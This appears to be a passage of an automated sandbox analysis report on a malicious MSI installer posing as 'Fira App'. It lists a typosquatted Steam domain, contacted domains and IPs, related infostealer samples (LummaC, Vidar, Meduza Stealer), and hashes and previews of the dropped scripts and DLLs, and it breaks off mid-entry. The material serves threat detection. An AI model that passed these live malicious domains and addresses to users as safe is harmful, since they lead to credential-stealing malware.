	https://staemcomrnunitly.ru/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
staticmaxepress.com	setup.msi	Get hash	malicious	Unknown	Browse	172.67.162.17
staticmaxepress.com	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.34.147

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	3bSDIpSIdF.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	3bSDIpSIdF.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	tasAgNgjbJ.exe	Get hash	malicious	Unknown	Browse	172.67.185.28
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	104.21.14.233
	rii2.mp3.hta	Get hash	malicious	LummaC	Browse	104.26.11.53
	mNPTwHOuvT.exe	Get hash	malicious	Vidar	Browse	172.64.41.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	L7GNkeVm5e.exe	Get hash	malicious	LummaC	Browse	172.67.162.17
	NDWffRLk7z.exe	Get hash	malicious	LummaC	Browse	172.67.162.17
	g3toRYa6JE.exe	Get hash	malicious	LummaC	Browse	172.67.162.17
	lBb4XI4eGD.exe	Get hash	malicious	LummaC	Browse	172.67.162.17
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	172.67.162.17
	setup.msi	Get hash	malicious	Unknown	Browse	172.67.162.17
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.162.17
	Setup.msi	Get hash	malicious	Unknown	Browse	172.67.162.17
	gem2.exe	Get hash	malicious	Unknown	Browse	172.67.162.17
	gem1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.162.17

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\UnRar.exe	setup.msi	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	u1XWB0BIju.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse
	6a7e35.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\BCUninstaller.exe	setup.msi	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	u1XWB0BIju.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	Setup.msi	Get hash	malicious	Unknown	Browse
	6a7e35.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse
	setup.msi	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\5924ee.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	20045
Entropy (8bit):	5.8310998891988675
Encrypted:	false
SSDEEP:	384:F+F5LhVtOHGM0TaucWp+zzpRpNc06tWbJfIM5xoUmqfMu6Ug7PWuomNvoF7w/7wL:F+F5LhVtOHGM0TaucWp+zzpRpNc06tWn
MD5:	DEF8492086AC26684EF81F35F4063309
SHA1:	3EEDF2E768CABF679E08D5C82C25A7B1DE3125B3
SHA-256:	8B126DFADBA7E35CAF535A99858B2D8F311842306CB1478DA7FFA98858D25B02
SHA-512:	0917E332C3A644FB2ED7ED8D98A2DAADE2A9BD4ADB59966292DA7B115BD956FE148E1E9848F9A86E5C375828B93D472BFD6F32DE8A963AA7232C37CC57F70490
Malicious:	false
Preview:	...@IXOS.@.....@.{,Z.@.....@.....@.....@.....@.....@......&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}..Fira App..Setup.msi.@.....@.....@.....@......icon_35.exe..&.{5086E490-79C3-4148-ABEE-DF320AB927CB}.....@.....@.....@.....@.......@.....@.....@.......@......Fira App......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{F39C344E-A83E-4760-8DA8-F27602095B4F}&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}.@......&.{BC83E781-7DE2-47A8-97C3-2E6CC9BCAD82}&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}.@......&.{279C32E3-A00A-4513-9A8B-D3984A41A6FB}&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}.@......&.{B61B35E4-8BE1-4171-B69B-E2423CE9179F}&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}.@......&.{FDDB96EE-847D-4B25-85B1-65E662CF63A8}&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}.@......&.{9608D8ED-8EC6-4540-B232-4A823606F862}&.{337A659D-79FE-4CED-9D18-362BBF6F3DBC}.@......&.{17B6E8D6-C004-40DB-BB2D-125D7C1CC21E}&.{337A659D-79FE-4CED-9

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	5.413197223328133
Encrypted:	false
SSDEEP:	24:3UWSKco4KmZjKbmOIKod6lss4RPQoUP7mZ9t7J0gt/NK3R82ia8HSVbV:EWSU4xympgv4RIoUP7mZ9tK8NWR82TVx
MD5:	A91A00C61ABC842BAAF20C5F19C31FD6
SHA1:	C3C442C8C706D1C15495EEAEAEDAD0BD9BE23837
SHA-256:	A0494C49656F3DF8A3043A22B477CA9C90E71CA54CE1E201DCAD72427750161C
SHA-512:	8CF952258CB11D23C265AA9BB8D58143B2D4279460BE23C5284458E6DD8438967D291B4A903D3793F5A420ECD6C8D941BEBA0778400F8DC7FC187C8D1E020332
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhtaww5n.s0n.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjzztiqa.lkm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\msi58CD.txt

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	3.0073551160284637
Encrypted:	false
SSDEEP:	3:Q0JUINRYplflrOdlVWNlANf5Yplf955:Q0JB0LJOn03ANqLN
MD5:	7A131AC8F407D08D1649D8B66D73C3B0
SHA1:	D93E1B78B1289FB51E791E524162D69D19753F22
SHA-256:	9ACBF0D3EEF230CC2D5A394CA5657AE42F3E369292DA663E2537A278A811FF5B
SHA-512:	47B6FF38B4DF0845A83F17E0FE889747A478746E1E7F17926A5CCAC1DD39C71D93F05A88E0EC176C1E5D752F85D4BDCFFB5C64125D1BA92ACC91D03D6031848D
Malicious:	true
Preview:	..Q.u.i.t.e.S.e.s. .:.<.-.>.:. . .<.<.:.>.>. .E.x.t.e.n.d.E.x.p.i.r.e. .:.<.-.>.:. .0. .<.<.:.>.>. .

C:\Users\user\AppData\Local\Temp\pss58D0.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6668
Entropy (8bit):	3.5127462716425657
Encrypted:	false
SSDEEP:	96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
MD5:	30C30EF2CB47E35101D13402B5661179
SHA1:	25696B2AAB86A9233F19017539E2DD83B2F75D4E
SHA-256:	53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
SHA-512:	882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
Malicious:	true
Preview:	..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".l.i.n.e.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.L.i.n.e.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\scr58CE.ps1

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	3.500405439723985
Encrypted:	false
SSDEEP:	6:Q1AGYNk79idK3fOlFoulk+KiV64AGIArMTlP1LlG7JidK3falnUOn03AnfGR:Q1F3Kvoq3VFVrMTQNeFUr3ZR
MD5:	A18EA6E053D5061471852A4151A7D4D0
SHA1:	AEA460891F599C4484F04A3BC5ACC62E9D5AD9F7
SHA-256:	C4EF109DD1FEF1A7E4AF385377801EEA0E7936D207EBCEBBE078BAD56FB1F4AB
SHA-512:	7530E2974622BB6649C895C062C151AC7C496CCC0BDAE4EB53C6F29888FA7B1E184026FBB39DDB5D8741378BEE969DD70B34AC7459F3387D92D21DBCFE28DC9A
Malicious:	true
Preview:	..$.s.k.g.i.e.h.g. .=. .A.I._.G.e.t.M.s.i.P.r.o.p.e.r.t.y. .".Q.u.i.t.e.S.e.s.".....$.o.i.g.s.e.i.g.j. .=. .[.u.i.n.t.3.2.].(.$.s.k.g.i.e.h.g. .-.r.e.p.l.a.c.e. .'.t.'.,. .'.'.).....A.I._.S.e.t.M.s.i.P.r.o.p.e.r.t.y. .".E.x.t.e.n.d.E.x.p.i.r.e.". .$.o.i.g.s.e.i.g.j.

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\BCUninstaller.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	310928
Entropy (8bit):	6.001677789306043
Encrypted:	false
SSDEEP:	3072:Zczkitvo4BpYN/6mBPry8TXROLdW5m4mURs9OOGC0kvxVCd7wANmSrvlPSIB0P+4:ZA4NCmBPry/N24OOjVxM7RNrrvEc0a
MD5:	147B71C906F421AC77F534821F80A0C6
SHA1:	3381128CA482A62333E20D0293FDA50DC5893323
SHA-256:	7DCD48CEF4CC4C249F39A373A63BBA97C66F4D8AFDBE3BAB196FD452A58290B2
SHA-512:	2FCD2127D9005D66431DD8C9BD5BC60A148D6F3DFE4B80B82672AFD0D148F308377A0C38D55CA58002E5380D412CE18BD0061CB3B12F4DAA90E0174144EA20C8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: setup.msi, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: u1XWB0BIju.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: 6a7e35.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.}\|...\|...\|....../p....../v....../1...u.a.l....../u...\|........./v....../}...Rich\|...........PE..d...i..d..........".................`<.........@..........................................`.................................................t$...........S...`..@........(..............T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data........@......................@....pdata..@....`.......&..............@..@_RDATA...............<..............@..@.rsrc....S.......T...>..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\UnRar.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	506008
Entropy (8bit):	6.4284173495366845
Encrypted:	false
SSDEEP:	6144:yY8mmN3YWYGAj9JwXScp39ioIKzKVEKfr01//bbh3S62Wt3A3ksFqXqjh6AusDyn:yY8XiWYGAkXh3Qqia/zAot3A6AhezSpK
MD5:	98CCD44353F7BC5BAD1BC6BA9AE0CD68
SHA1:	76A4E5BF8D298800C886D29F85EE629E7726052D
SHA-256:	E51021F6CB20EFBD2169F2A2DA10CE1ABCA58B4F5F30FBF4BAE931E4ECAAC99B
SHA-512:	D6E8146A1055A59CBA5E2AAF47F6CB184ACDBE28E42EC3DAEBF1961A91CEC5904554D9D433EBF943DD3639C239EF11560FA49F00E1CFF02E11CD8D3506C4125F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: setup.msi, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: u1XWB0BIju.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: Setup.msi, Detection: malicious, Browse Filename: 6a7e35.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse Filename: setup.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.}............\|.&.....\|.$.J...\|.%.....H}*.....H}./....H}./.....~P.....H}./.....~D.........z...F}./....F}(.....F}./....Rich............PE..d.....@f.........."....!.b.....................@.....................................'....`.................................................\|...........H........4.......(......8...0I..T....................J..(....G..@............................................text....a.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....pdata...4.......6..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..8...........................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12224
Entropy (8bit):	6.596101286914553
Encrypted:	false
SSDEEP:	192:4nWYhWxWWFYg7VWQ4uWjXUtpwBqnajrmaaGJ:2WYhWvZqlQGJ
MD5:	919E653868A3D9F0C9865941573025DF
SHA1:	EFF2D4FF97E2B8D7ED0E456CB53B74199118A2E2
SHA-256:	2AFBFA1D77969D0F4CEE4547870355498D5C1DA81D241E09556D0BD1D6230F8C
SHA-512:	6AEC9D7767EB82EBC893EBD97D499DEBFF8DA130817B6BB4BCB5EB5DE1B074898F87DB4F6C48B50052D4F8A027B3A707CAD9D7ED5837A6DD9B53642B8A168932
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...Y.=i.........." .........................................................0......a.....`.........................................`...,............ ...................!..............T............................................................................rdata..P...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-2-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12224
Entropy (8bit):	6.640081558424349
Encrypted:	false
SSDEEP:	192:iTWYhWyWWFYg7VWQ4uWq6Cu87ZqnajgnLSyu:sWYhWi1XHllk2yu
MD5:	7676560D0E9BC1EE9502D2F920D2892F
SHA1:	4A7A7A99900E41FF8A359CA85949ACD828DDB068
SHA-256:	00942431C2D3193061C7F4DC340E8446BFDBF792A7489F60349299DFF689C2F9
SHA-512:	F1E8DB9AD44CD1AA991B9ED0E000C58978EB60B3B7D9908B6EB78E8146E9E12590B0014FC4A97BC490FFE378C0BF59A6E02109BFD8A01C3B6D0D653A5B612D15
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....y1..........." .........................................................0...........`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11712
Entropy (8bit):	6.6023398138369505
Encrypted:	false
SSDEEP:	192:5WYhWYWWFYg7VWQ4SWSS/njxceXqnajLJ35H:5WYhW4gjmAlnJpH
MD5:	AC51E3459E8FCE2A646A6AD4A2E220B9
SHA1:	60CF810B7AD8F460D0B8783CE5E5BBCD61C82F1A
SHA-256:	77577F35D3A61217EA70F21398E178F8749455689DB52A2B35A85F9B54C79638
SHA-512:	6239240D4F4FA64FC771370FB25A16269F91A59A81A99A6A021B8F57CA93D6BB3B3FCECC8DEDE0EF7914652A2C85D84D774F13A4143536A3F986487A776A2EAE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d.....Ab.........." .........................................................0......d.....`.........................................`................ ...................!..............T............................................................................rdata..4...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.614262942006268
Encrypted:	false
SSDEEP:	192:4WYhWFsWWFYg7VWQ4eWZzAR/BVrqnajcJH:4WYhWFMJRLlA5
MD5:	B0E0678DDC403EFFC7CDC69AE6D641FB
SHA1:	C1A4CE4DED47740D3518CD1FF9E9CE277D959335
SHA-256:	45E48320ABE6E3C6079F3F6B84636920A367989A88F9BA6847F88C210D972CF1
SHA-512:	2BADF761A0614D09A60D0ABB6289EBCBFA3BF69425640EB8494571AFD569C8695AE20130AAC0E1025E8739D76A9BFF2EFC9B4358B49EFE162B2773BE9C3E2AD4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0............`.........................................`................ ...................!..............T............................................................................rdata..@...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.654155040985372
Encrypted:	false
SSDEEP:	192:imxD3vEWYhWnWWFYg7VWQ4eWMOwNbDXbBqnaj0qJm8:iIEWYhWFpLbBlwqJm
MD5:	94788729C9E7B9C888F4E323A27AB548
SHA1:	B0BA0C4CF1D8B2B94532AA1880310F28E87756EC
SHA-256:	ACCDD7455FB6D02FE298B987AD412E00D0B8E6F5FB10B52826367E7358AE1187
SHA-512:	AB65495B1D0DD261F2669E04DC18A8DA8F837B9AC622FC69FDE271FF5E6AA958B1544EDD8988F017D3DD83454756812C927A7702B1ED71247E506530A11F21C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d....:.[.........." .........................................................0......~.....`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15304
Entropy (8bit):	6.548897063441128
Encrypted:	false
SSDEEP:	192:+AuVYPvVX8rFTsRWYhWyWWFYg7VWQ4eWQBAW+JSdqnajeMoLR9au:TBPvVXLWYhWiBdlaLFAu
MD5:	580D9EA2308FC2D2D2054A79EA63227C
SHA1:	04B3F21CBBA6D59A61CD839AE3192EA111856F65
SHA-256:	7CB0396229C3DA434482A5EF929D3A2C392791712242C9693F06BAA78948EF66
SHA-512:	97C1D3F4F9ADD03F21C6B3517E1D88D1BF9A8733D7BDCA1AECBA9E238D58FF35780C4D865461CC7CD29E9480B3B3B60864ABB664DCDC6F691383D0B281C33369
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................@............`.........................................`................0...................!..............T............................................................................rdata..(...........................@..@.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11712
Entropy (8bit):	6.622041192039296
Encrypted:	false
SSDEEP:	192:dzWYhW1sWWFYg7VWQ4yWL3sQlmqnajlD4h1N:BWYhW2e6l94h1N
MD5:	35BC1F1C6FBCCEC7EB8819178EF67664
SHA1:	BBCAD0148FF008E984A75937AADDF1EF6FDA5E0C
SHA-256:	7A3C5167731238CF262F749AA46AB3BFB2AE1B22191B76E28E1D7499D28C24B7
SHA-512:	9AB9B5B12215E57AF5B3C588ED5003D978071DC591ED18C78C4563381A132EDB7B2C508A8B75B4F1ED8823118D23C88EDA453CD4B42B9020463416F8F6832A3D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................." .........................................................0......./....`.........................................`...L............ ...................!..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.730719514840594
Encrypted:	false
SSDEEP:	192:/VyWYhWjAWWFYg7VWQ4eWiuNwzNbDXbBqnaj0q:/VyWYhW8g+LbBlwq
MD5:	3BF4406DE02AA148F460E5D709F4F67D
SHA1:	89B28107C39BB216DA00507FFD8ADB7838D883F6
SHA-256:	349A79FA1572E3538DFBB942610D8C47D03E8A41B98897BC02EC7E897D05237E
SHA-512:	5FF6E8AD602D9E31AC88E06A6FBB54303C57D011C388F46D957AEE8CD3B7D7CCED8B6BFA821FF347ADE62F7359ACB1FBA9EE181527F349C03D295BDB74EFBACE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d................" .........................................................0............`.........................................`................ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11720
Entropy (8bit):	6.626458901834476
Encrypted:	false
SSDEEP:	192:P9RWYhWEWWFYg7VWQ4eWncTjxceXqnajLJS:LWYhWk3TjmAlnJS
MD5:	BBAFA10627AF6DFAE5ED6E4AEAE57B2A
SHA1:	3094832B393416F212DB9107ADD80A6E93A37947
SHA-256:	C78A1217F8DCB157D1A66B80348DA48EBDBBEDCEA1D487FC393191C05AAD476D
SHA-512:	D5FCBA2314FFE7FF6E8B350D65A2CDD99CA95EA36B71B861733BC1ED6B6BB4D85D4B1C4C4DE2769FBF90D4100B343C250347D9ED1425F4A6C3FE6A20AED01F17
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...Ge..Ge..Ge../e..Ge../a..Ge../...Ge../g..Ge.Rich.Ge.........................PE..d...>G.j.........." .........................................................0............`.........................................`...`............ ...................!..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
